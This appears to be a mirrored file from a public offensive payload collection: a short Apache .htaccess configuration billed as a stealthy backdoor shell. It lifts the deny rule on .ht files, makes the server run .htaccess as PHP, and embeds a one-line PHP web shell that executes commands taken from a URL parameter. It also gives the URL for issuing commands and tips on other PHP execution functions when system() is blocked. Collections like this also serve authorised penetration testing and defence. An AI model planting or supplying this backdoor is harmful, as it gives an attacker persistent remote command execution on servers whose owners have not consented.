mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-23 12:55:27 +00:00
24 lines
662 B
Plaintext
24 lines
662 B
Plaintext
|
# htaccess backdoor shell
|
||
|
# this is relatively stealthy compared to a typical webshell
|
||
|
|
||
|
# overriding deny rule
|
||
|
# making htaccess accessible from the internet
|
||
|
# without this you'll get a HTTP 403
|
||
|
<Files ~ "^\.ht">
|
||
|
Require all granted
|
||
|
Order allow,deny
|
||
|
Allow from all
|
||
|
</Files>
|
||
|
|
||
|
# Make the server treat .htaccess file as .php file
|
||
|
AddType application/x-httpd-php .htaccess
|
||
|
|
||
|
# <?php system($_GET['cmd']); ?>
|
||
|
|
||
|
# To execute commands you would navigate to:
|
||
|
# http://vulnerable.com/.htaccess?cmd=YourCommand
|
||
|
|
||
|
# If system(); isnt working then try other syscalls
|
||
|
# e.g. passthru(); shell_exec(); etc
|
||
|
# If you still cant execute syscalls, try bypassing php.ini via htaccess
|